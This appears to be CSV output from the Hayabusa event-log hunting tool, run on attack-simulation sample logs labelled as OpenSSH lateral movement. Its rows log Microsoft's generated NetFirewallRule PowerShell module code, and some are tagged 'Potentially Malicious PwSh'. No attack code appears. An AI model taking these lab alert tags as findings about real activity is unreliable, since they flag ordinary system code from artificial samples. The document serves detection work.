[Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAp",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:37.905 +00:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"plicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Direction') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Direction}) $__cmdletization_queryBuilder.FilterByProperty('Direction', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Action') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Action}) $__cmdletization_queryBuilder.FilterByProperty('Action', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EdgeTraversalPolicy') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EdgeTraversalPolicy}) $__cmdletization_queryBuilder.FilterByProperty('EdgeTraversalPolicy', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LooseSourceMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LooseSourceMapping}) $__cmdletization_queryBuilder.FilterByProperty('LooseSourceMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LocalOnlyMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LocalOnlyMapping}) $__cmdletization_queryBuilder.FilterByProperty('LocalOnlyMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Owner') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Owner}) $__cmdletization_queryBuilder.FilterByProperty('Owner', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetFirewallRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallApplicationFilter') -and (@('ByAssociatedNetFirewallApplicationFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallApplicationFilter}, 'MSFT_NetFirewallRuleFilterByApplication', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetFirewallRuleFilterByInter",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:37.905 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"plicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Direction') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Direction}) $__cmdletization_queryBuilder.FilterByProperty('Direction', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Action') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Action}) $__cmdletization_queryBuilder.FilterByProperty('Action', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EdgeTraversalPolicy') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EdgeTraversalPolicy}) $__cmdletization_queryBuilder.FilterByProperty('EdgeTraversalPolicy', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LooseSourceMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LooseSourceMapping}) $__cmdletization_queryBuilder.FilterByProperty('LooseSourceMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LocalOnlyMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LocalOnlyMapping}) $__cmdletization_queryBuilder.FilterByProperty('LocalOnlyMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Owner') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Owner}) $__cmdletization_queryBuilder.FilterByProperty('Owner', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetFirewallRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallApplicationFilter') -and (@('ByAssociatedNetFirewallApplicationFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallApplicationFilter}, 'MSFT_NetFirewallRuleFilterByApplication', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetFirewallRuleFilterByInter",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:37.905 +00:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"face', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetFirewallRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetFirewallRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallSecurityFilter') -and (@('ByAssociatedNetFirewallSecurityFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallSecurityFilter}, 'MSFT_NetFirewallRuleFilterBySecurity', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallServiceFilter') -and (@('ByAssociatedNetFirewallServiceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallServiceFilter}, 'MSFT_NetFirewallRuleFilterByService', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetFirewallRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Enable', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Enable-NetFirewallRule' -Alias '*' function Disable-NetFirewallRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction[]] ${Direction}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action[]] ${Action}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal[]] ${EdgeTraversalPolicy}, [Parameter(ParameterSetName='ByQuery')] [Alias('LSM')] [ValidateNotNull()] [bool[]] ${LooseSourceMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${LocalOnlyMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Owner}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, 